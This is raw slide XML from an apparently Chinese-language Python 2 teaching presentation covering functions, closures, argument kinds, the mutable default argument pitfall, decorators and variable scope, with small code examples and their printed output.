                </a:extLst>
              </a:tr>
              <a:tr h="202782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ZeroDivisionError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0" lang="zh-CN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除法，第二参数为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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2691" marR="2691" marT="2691" marB="2691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9457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en-US" altLang="zh-CN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kumimoji="0" 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82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StopIteration</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0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8200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zh-CN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8200"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>迭代器没有更多的值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939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58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中的函数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835" y="557636"/>
            <a:ext cx="8337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中函数声明和函数定义是视为一体的，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无论是命名函数，还是匿名函数，都是语句和表达式的集合，函数也是一个类对象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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8131" y="1663065"/>
            <a:ext cx="312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function(params):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block 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expression/value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> 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5616" y="126375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函数定义的基本形式如下：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262835" y="2607096"/>
            <a:ext cx="4130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采用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关键字进行函数的定义，不用指定返回值类型。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函数参数可以是任意个，也不用指定参数类型，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中变量都是弱类型的，自动根据值来维护其类型。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语句是可选的，可在函数体内任何地方出现，表示函数调用执行结束；如果没有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语句会自动返回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，如有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语句，但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后面没有接表达式或者值的话也是返回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endParaRPr lang="zh-CN" altLang="en-US" sz="12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2977" y="2754704"/>
            <a:ext cx="3251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008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__name__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>返回函数名字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN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CN" sz="11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1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square.func_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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'square'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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16282" y="1655143"/>
            <a:ext cx="352839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008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__doc__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E2E2E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回指定函数的文档字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1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zh-CN" sz="11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"""return square of given number"""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zh-CN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CN" sz="11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1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square.__doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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'return square of given number'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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2977" y="3684314"/>
            <a:ext cx="30854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008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__module__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>返回函数定义所在模块的名字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN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CN" sz="11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1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square.__module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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'__main__'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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99446" y="1289104"/>
            <a:ext cx="2733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函数属性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funcname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1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12109" y="145554"/>
            <a:ext cx="2990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/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>函数及闭包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217006" y="658961"/>
            <a:ext cx="8675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函数内包含子函数，并最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>子函数。作用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在函数的外部（即子函数），可直接读取该函数的局部变量，可实现类似缓存和封装效果。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781524" y="1306252"/>
            <a:ext cx="2489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/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>闭包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>函数里定义函数，返回函数对象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lineConf2():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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> draw2Line(x):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>         return 2*x+1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>    return draw2Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print lineConf2().__name__, lineConf2()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     real2Line=lineConf2()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print real2Line(2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6931241" y="1306252"/>
            <a:ext cx="1813660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000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>函数和引用环境组合示例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lineConf4(a, b):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> draw4Line(x):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>           return a*x + b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return draw4Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>line1 = lineConf4(2, 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>line2 = lineConf4(4, 5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print line1(5), line2(5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print line2.__closure__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4463739" y="1306252"/>
            <a:ext cx="2231758" cy="22621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000" dirty="0"/>
              <a:t>#conf3,linef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>draw3Line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>环境变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> lineConf3():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     line=3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     conf3=33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> draw3Line(x):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>           return 3*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>x+line</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     return draw3Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>conf3=11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>real3Line=lineConf3()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print real3Line(3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>print real3Line.__closure__</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="1306252"/>
            <a:ext cx="1370046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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>函数定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> draw1Line(x):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>    return x+1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>print draw1Line(1)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2878" y="2506580"/>
            <a:ext cx="145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运行结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p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718426" y="3003674"/>
            <a:ext cx="2702416" cy="707886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运行结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>draw2Line </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>&lt;function draw2Line at 0x0000000002A2CAC8&gt;</a:t>
            </a:r>
          </a:p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463739" y="3665394"/>
            <a:ext cx="2231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运行结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>(&lt;cell at 0x0000000002A30228: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t> object at 0x00000000025B8148&gt;,)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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887994" y="3397021"/>
            <a:ext cx="2065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运行结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>13 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>(&lt;cell at 0x0000000002A30348: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t> object at 0x00000000025B8130&gt;, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>&lt;cell at 0x0000000002A303A8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t> object at 0x00000000025B8118&gt;)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="云形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246725" y="3726410"/>
            <a:ext cx="3069598" cy="933571"/>
          </a:xfrm>
          <a:prstGeom prst="clou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对象环境变量属性：</a:t>
            </a:r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__closure__</a:t>
            </a:r>
          </a:p>
          <a:p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闭包即函数和与其相关的引用环境组合而成的实体。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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6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41988"/>
            <a:ext cx="37099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参数中的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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217006" y="627157"/>
            <a:ext cx="8675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200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kwargs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、*       非指针，分别代表可变参数、关键字参数、命名关键字参数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6" y="1028293"/>
            <a:ext cx="8504925" cy="3695746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99226" y="1036244"/>
            <a:ext cx="8513295" cy="1141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21011" y="159484"/>
            <a:ext cx="29108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默认参数及陷阱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="658961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200"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 带位置参数名字传参可以不按定义顺序           默认参数尽量不要指向可变对象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94976" y="1080926"/>
            <a:ext cx="7888643" cy="1946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563150" y="1100389"/>
            <a:ext cx="1" cy="355868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92" y="1096424"/>
            <a:ext cx="4119180" cy="35586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1" y="1109291"/>
            <a:ext cx="4198573" cy="3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48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01343" y="776583"/>
            <a:ext cx="3402900" cy="1745513"/>
            <a:chOff x="4586171" y="2917832"/>
            <a:chExt cx="2664296" cy="1512168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4586171" y="2917832"/>
              <a:ext cx="2664296" cy="151216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 = 1, b = []):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zh-CN" sz="14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b.append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print b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  <a:endParaRPr lang="zh-CN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731"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6370575" y="3291830"/>
              <a:ext cx="435297" cy="735988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13965" y="776583"/>
            <a:ext cx="4934099" cy="3693319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-*- coding: utf-8 -*-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(name,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zh-CN" altLang="en-US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=[]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.append(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fish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{0} likes {1}.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.format(name,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.join(animal)))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show(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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301342" y="2965649"/>
            <a:ext cx="3528392" cy="1477328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输出：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 likes fish.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 likes fish.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 likes dog fish.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Mr Wang likes dog fish.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333706" y="146890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可变对象解决方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13836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2764" y="482304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49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30214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语法糖之装饰器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="593548"/>
            <a:ext cx="8675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语法糖：添加某种语法，对语言功能没影响，方便程序员使用，增加程序可读性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6" y="909495"/>
            <a:ext cx="4059490" cy="38224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14512" y="932102"/>
            <a:ext cx="45403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funcTimeCost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计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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函数执行的时间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func(*args,**kw)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前面和后面的代码跟自己无关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切面编程，类似的状态机编程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若计算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100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万个数求和，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万个，。。。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funcTimeCost(funcDemo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100)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funcTimeCost(funcDemo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1000)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。。。。。。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能不能寻找一个更简洁的调用方式</a:t>
            </a:r>
            <a:b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82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899592" y="202868"/>
            <a:ext cx="1669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初次的错觉</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1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619181"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611560" y="684596"/>
          <a:ext cx="3227388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" name="Visio" r:id="rId4" imgW="4366954" imgH="5446897" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="4366954" imgH="5446897" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="706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684596"/>
                        <a:ext cx="3227388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4" b="13191"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4873"/>
            <a:ext cx="974575" cy="67972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618236" y="740703"/>
            <a:ext cx="3528392" cy="1296554"/>
            <a:chOff x="4572000" y="677676"/>
            <a:chExt cx="3528392" cy="1296554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4572000" y="677676"/>
              <a:ext cx="3528392" cy="1296554"/>
              <a:chOff x="4716016" y="627124"/>
              <a:chExt cx="3528392" cy="129655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860032" y="771550"/>
                <a:ext cx="1368152" cy="100811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f():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num=2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print </a:t>
                </a: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f()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 num</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1100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732240" y="771550"/>
                <a:ext cx="1368152" cy="100811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f():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print </a:t>
                </a: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num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num = 2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f()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altLang="zh-CN" sz="11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 num</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1100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716016" y="627124"/>
                <a:ext cx="3528392" cy="129655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7" idx="0"/>
                <a:endCxn id="7" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6480212" y="627124"/>
                <a:ext cx="0" cy="129655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135"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6147544" y="1029676"/>
              <a:ext cx="377302" cy="59255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050283" y="2199954"/>
            <a:ext cx="2664296" cy="1512168"/>
            <a:chOff x="4572000" y="2775262"/>
            <a:chExt cx="2664296" cy="1512168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2775262"/>
              <a:ext cx="2664296" cy="151216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1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 = 1, b = []):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zh-CN" sz="11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b.append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print b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apd_item</a:t>
              </a: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  <a:endParaRPr lang="zh-CN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731"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6370575" y="3291830"/>
              <a:ext cx="435297" cy="735988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0604" y="1491630"/>
            <a:ext cx="440981" cy="90685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635752" y="3904395"/>
            <a:ext cx="3666432" cy="711865"/>
            <a:chOff x="4874693" y="3911022"/>
            <a:chExt cx="3222566" cy="739724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="矩形 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4874693" y="3911022"/>
              <a:ext cx="3222566" cy="739724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l-PL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pl-PL" altLang="zh-CN" sz="11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CN" sz="11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unction</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pl-PL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(a, b=0, *</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pl-PL" altLang="zh-CN" sz="11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args</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pl-PL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**</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pl-PL" altLang="zh-CN" sz="11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kw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pl-PL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pass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45"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7554186" y="3970855"/>
              <a:ext cx="448426" cy="626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78568"/>
            <a:ext cx="34219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你变了，人形画皮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6" y="574992"/>
            <a:ext cx="3939209" cy="415699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12486" y="523875"/>
            <a:ext cx="4341922" cy="738664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funcDemo=funcTimeCost(funcDemo)</a:t>
            </a:r>
          </a:p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funcDemo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是个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realFunc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对象，只是名字跟原来一样再简单点，变身装饰器！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8615"/>
            <a:ext cx="4291356" cy="33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1733" y="154543"/>
            <a:ext cx="3483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装饰器到底怎么调用的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3832156" y="561627"/>
            <a:ext cx="2160241" cy="2708434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执行结果：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decorator_a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decorator_a</a:t>
            </a:r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decorator_b</a:t>
            </a:r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inner_a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f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inner_b</a:t>
            </a:r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inner_a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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in fa</a:t>
            </a:r>
          </a:p>
          <a:p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zh-CN" altLang="en-US" sz="14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00192" y="539440"/>
            <a:ext cx="2486797" cy="4031873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过程分析：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@decorator_a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f(x):</a:t>
            </a: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输出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 in a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f(x)=inner_a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@decorator_b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inner_a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输出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 in b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由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inner_a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变成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inner_b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f(x)=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inner_b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(*,**)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print get in b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return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inner_a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(**)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9" y="567521"/>
            <a:ext cx="3240332" cy="41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1733" y="154543"/>
            <a:ext cx="3483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带参数装饰器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="642513"/>
            <a:ext cx="3541694" cy="3693319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zh-CN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outputLevel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('simple')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执行结果：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4999950000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zh-CN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outputLevel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('ok')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执行结果：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4999950000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Exec Time: 0.00659979168047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去掉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outputLevel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('simple')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和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outputLevel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(level):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中的参数，就还原到之前了。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19266"/>
            <a:ext cx="3603572" cy="4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1733" y="154543"/>
            <a:ext cx="3483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内置装饰器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6" y="563944"/>
            <a:ext cx="3027183" cy="41540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98" y="571895"/>
            <a:ext cx="2318729" cy="4154016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6723393" y="569927"/>
            <a:ext cx="2160240" cy="4148034"/>
          </a:xfr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执行结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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变量作用域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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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#property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装饰器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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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类方法和静态方法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normal show 22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staic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show 16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class show 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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staic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show 16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class show 18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3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65" y="516445"/>
            <a:ext cx="8229600" cy="10772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n-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CMDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过子模块</a:t>
            </a:r>
            <a:r>
